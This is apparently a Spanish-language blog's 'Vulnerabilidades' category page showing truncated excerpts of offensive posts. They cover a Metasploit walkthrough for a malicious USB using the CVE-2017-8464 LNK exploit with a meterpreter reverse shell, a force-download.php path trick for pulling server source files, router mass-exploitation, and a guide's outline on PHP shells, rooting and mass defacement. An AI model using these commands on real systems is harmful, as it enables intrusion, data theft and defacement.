Categoría: Vulnerabilidades

Nipper – Toolkit Web Scan

Nipper La Primera herramienta de escáner de vulnerabilidades WEB, En entorno Android (Versión para iOS en desarrollo), este escáner de vulnerabilidad fue enfocado para CMS más usadas, (WordPress, Drupal, Joomla. Blogger ). En su primera versión Nipper cuenta con 10 módulos distintos, para recopilar información acerca de un URL en específica. Su

Explotación masiva de vulnerabilidades en ruteadores By HKM

  Ver disapositivas Los métodos para escanear redes han evolucionado, y podemos encontrar millones de dispositivos de interconexión vulnerables que ponen en riesgo la información de sus propietarios y facilitan ataques a mayor escala. Mostraremos las técnicas que actualmente se utilizan para realizar escaneos de todo Internet y algunas vulnerabilidades

Creando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464 By HKM

1. En Metasploit crea un HANDLER para recibir la conexión: msf 》 use exploit/multi/handler msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) 》 set LHOST TUDIRECCIÓNIP msf exploit(handler) 》 run 2. Ahora utiliza el exploit cve_2017_8464_lnk_rce para crear los archivos: msf exploit(handler) 》 use exploit/windows/fileformat/cve_2017_8464_lnk_rce msf exploit(cve_2017_8464_lnk_rce) 》 set payload

Explotando Full Source Diclosure Bugueando “force-download.php” By Gothic-X

Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server. simplemente tenemos la web: http://www.xxx.xx.xx/force-download.php?file=archivo.pdf cambiamos el archivo.pdf por “force-download.php” para comprobar que es vulnerable. si te

Rooteando y Owneando By Zer0 z0orG :: Ir4Dex Group

Rooteando y Owneando ==================== Autor: Zer0 z0orG ——————– ++++++ Indice ++++++ ——————– 1. Introducción 2. Ocultarse 3. Penetrar (mal pensados xD) 4. Encontrar panel de administracion 5. Subiendo phpshell 6. Rooteando 7. Mass Defecement 8. Agradecimientos 9. Contacto 0. Good Bye ————————- +++++ Introducción ++++++ ————————- Que onda!! En este